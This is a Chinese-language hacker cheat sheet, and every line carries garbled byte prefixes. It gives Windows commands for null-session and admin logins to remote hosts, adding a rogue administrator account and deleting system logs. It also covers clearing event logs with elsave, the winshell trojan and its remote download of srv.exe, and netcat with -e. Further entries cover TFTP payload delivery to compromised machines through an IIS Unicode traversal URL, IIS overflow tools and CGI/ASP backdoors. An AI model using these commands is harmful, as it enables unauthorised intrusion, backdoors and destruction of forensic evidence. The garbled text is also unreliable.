网管和黑客都必须知道的命令
*ra>�Kl0
� 常用的几条NET命令:
,�II3b(��l LrT� EF
�j (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
\P")Eh =�d V)�l:f�Um2 (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
`*�B���V@ j-�-byk6PB (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
6B|i-b�$~� @0]WMI9B"B (查看远程主机时间) net time \\IP地址
_>�rM[\|�X ?�$�T�^L"~ (定时启动某个程序) at \\IP地址 02:18 readme.exe
w���52p�y7 �l#%7BGwzY (查看共享) net view \\IP地址
'�O\ �y7"a "qd�|!:b�E (查看netbios工作组列表) nbtstat -A IP地址
g�Pb.%^��p >3@3~F%xAX (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
�tfZ�@4�%' qw?(^uZNW (这两条把自己增加到管理员组): net user 用户名 密码 /add
=J�)<Nx.gA wDG�b� �h= net localgroup Administrators 用户名 /add
�`-Ozjb��M 0y+^��{@lU (断开连接) net use \\IP地址\ipc$ /delete
G�BT|1c�'i GqR�|�hg� 扫尾:
o-7�{\%+M� yN�ow��hh� del C:\winnt\system32\logfiles\*.*
�Z�"%���.� ?�|+e*{4�k del C:\winnt\ssytem32\config\*.evt
2[HPU �M2> $#p5B�QQ�| del C:\winnt\system32\dtclog\*.*
�6<$.Z-��, q?dd5JzZy, del C:\winnt\system32\*.log
���x\(#��
�p:5�N�M�o del C:\winnt\system32\*.txt
q4&!�� mDU A���[ncwJ del C:\winnt\*.txt
MP�)Prl��> kfZ�`|w@q del C:\winnt\*.log
u~i�pB*Zf aH�mg!s}�& 一、netsvc.exe
�$�
P�5K�� � �Pd\4hy 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
Ns�P=l]� � <�kPNe>-f netsvc /list \\IP地址
�ZTV)�D�� ]�%�HxzJ�� netsvc schedule \\IP地址 /query
FH�w%yn��C ��mL��2��J netsvc \\IP地址 schedule /start
��:PW"7|c! @#OL{yM�y� 二、OpenTelnet.exe
8�=�T�C 3] HI �1����T 远程启动主机的Telnet服务,并绑定端口到7878,例如:
7Q9�H�k(Z9 }DS�%?6}Sy OpenTelnet \\IP地址 用户名 密码 1 7878
GIH{tr1:<� wT\B�A'VQ� 然后就可以telnet到主机的7878端口,进入DOS方式下:
't�&1y6Uu� �\t&!� &R# telnet IP地址 7878
$rmxwxz&W: k6&~)7 -�f 三、winshell.exe
&:����&�l+ �ix2i.w�dD 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
�C@eL9R;N1 R6od{#5H$� p Path (查看winshell主程序的路径信息)
yRyX���lZC �gr�zmW4Cw b reBoot (重新启动机器)
<)�wLxWalF ��QK[^G6TI d shutDown (关闭机器)
\}�v@!PQ�l �q
�i yK�� s Shell (执行后你就会看到可爱的“C:\>”)
O>q�lW�Pht $���cHU�,� x eXit (退出本次登录会话,此命令并不终止winshell的运行)
kY\faWu�R� DxNob�-F�r CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
2Ax"X12�{6 w01[oU$�x= 四、3389登陆器,GUI方式登录远程主机的
�z+7V}a�PM `gx\m�=x�G 五、elsave.exe
$��q:l �\ 2A����;�i� 事件日志清除工具
jI�7 x�<�= 'g�)f5n a[ elsave -s \\IP地址 -l "application" -C
rHB>j�N@�$ Y3��DqsZ@� elsave -s \\IP地址 -l "system" -C
dN3^��P�K RU7+��$Z0K elsave -s \\IP地址 -l "security" -C
�C�/T�k`C& N=�C�t�3 执行后成功清除应用程序日志,系统日志,安全日志
`e<IO_c��g %xC��L&}bY 六、hbulot.exe
SoM,o]s�#y slP�r�^�)� 开启win2kserver和winxp的3389服务
�Gg9s.]�W� �P�i�M(Q�R hbulot [/r]
i��@nRZ$�K 2|lR@�L sr 使用/r表示安装完成后自动重起目标使设置生效。
�z��P�p�22 v4�s4D�1�} 七、nc.exe(netcat.exe)
bWp:!�w�#K �W��,6�q�1 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
^3$U[u%q/{ "�h_f-�v�P 想要连接到某处: nc [-options] hostname port[s] [ports] ...
,�--#3+]XU f}�(4v1�T� 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
�@�y7�KP$t IC'+{3�.m8 参数:
p-��{ 4 $W d9:I.SA)�E -e prog 程序重定向,一旦连接,就执行 [危险!!]
S1�Y�,5,}� H 4�ELIF#@ -g gateway source-routing hop point[s], up to 8
fYy� w�2" �p�J}U'*Z2 -G num source-routing pointer: 4, 8, 12, ...
gi,7X\`K�Q >;�,23X��� -h 帮助信息
�/B?wn=][� "[~y�u*
�S -i secs 延时的间隔
]sb?l�Axh{ %<nG�m��\� -l 监听模式,用于入站连接
8iaMr�278W a��5/, O4Q -n 指定数字的IP地址,不能用hostname
�)jgz(\�KZ �}Y.YJXum� -o file 记录16进制的传输
T��90O.]�S �*�W\��3cS -p port 本地端口号
DC�iU?�u~� Z�qm%�qm:� -r 任意指定本地及远程端口
�2[`��n<R\ y4jiOh�F<d -s addr 本地源地址
?�%~p�@��� `RS��iZ%Al -u UDP模式
2WH(c$6PWf �f\=
@jV� -v 详细输出——用两个-v可得到更详细的内容
6AJ`)8H�X� ��w�E.jf.q -w secs timeout的时间
m<3. X"-�� �P�_0X+T�z -z 将输入输出关掉——用于扫描时
Y�QC�.jnb2 八、TFTPD32.EXE
w:%�NEa,�Z WuY#�Kx~2 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
O7�13�'�i� ,jC~�U s�< http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
)��u�Hat#� #�Y�7iJ�PO 然后可以直接令文件运行:
];Noe�9o� �faR�Qj:R8 http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
?GNR�a��b� :2c(.-��[` 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
�6/L[`n"G� 4�h!yh2c.. 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
u;nn:K1QFr 8�Gy]��n�D 一、一 Xscan命令行运行参数说明:
2EpQ(G
J�� v��zI>:�Bf 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
i=�n;�r�T� N�e|CW�UhO 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
$!9U\A�u>2 h�\@X!�Z,� xscan -file <主机列表文件名> <检测项目> [其他选项]
3lW�Ga7<4Z >g!$H�}\�� 其中<检测项目> 含义如下:
��}GU�Rq�# <Rw2F?S~)n -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
�cD`�?"��n �$m5Iv_� -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
jG�`PyI�gw d�LH@,EKl) -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
e"^�WXP.t& h���!(�#
/ -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
6)�Yckx�N^ v�2����]N5 -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
?SYmsa�Sr5 ;U?=YSHk�7 [其他选项] 含义如下:
W#g!Us�f:/ "B����__a( -v: 显示详细扫描进度
}o!�b3�*�# �sYXL�VJ>b -p: 跳过Ping不通的主机
tE-�bHu370 ]#shuZ##>0 -o: 跳过没有检测到开放端口的主机
,o�v$�`��v OjffN'a+N -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
